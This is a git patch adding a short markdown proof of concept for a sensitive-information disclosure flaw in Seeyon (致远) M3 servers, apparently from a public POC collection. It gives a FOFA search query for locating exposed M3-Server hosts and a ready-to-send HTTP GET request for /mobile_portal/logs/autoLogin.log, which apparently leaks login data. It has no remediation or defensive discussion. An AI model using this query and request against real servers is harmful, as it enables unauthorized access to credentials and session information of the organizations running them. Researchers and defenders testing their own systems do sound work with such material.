From ef9d4078ec02dc4504643a3e2d08b25857a616d5 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 8 May 2024 20:10:05 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=87=B4=E8=BF=9CM3=E6=95=8F=E6=84=9F?=
 =?UTF-8?q?=E4=BF=A1=E6=81=AF=E6=B3=84=E9=9C=B2=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 致远M3敏感信息泄露漏洞.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 致远M3敏感信息泄露漏洞.md

diff --git a/致远M3敏感信息泄露漏洞.md b/致远M3敏感信息泄露漏洞.md
new file mode 100644
index 0000000..ae289bf
--- /dev/null
+++ b/致远M3敏感信息泄露漏洞.md
@@ -0,0 +1,19 @@
+## 致远M3敏感信息泄露漏洞
+
+
+## fofa
+```
+title="M3-Server"
+```
+
+## poc
+```
+GET /mobile_portal/logs/autoLogin.log HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Accept-Charset: utf-8
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![e5b392d5ab145b5acba296fcf2ea09c8](https://github.com/wy876/POC/assets/139549762/9e4e58b3-75d0-4f98-974b-391397fba2e4)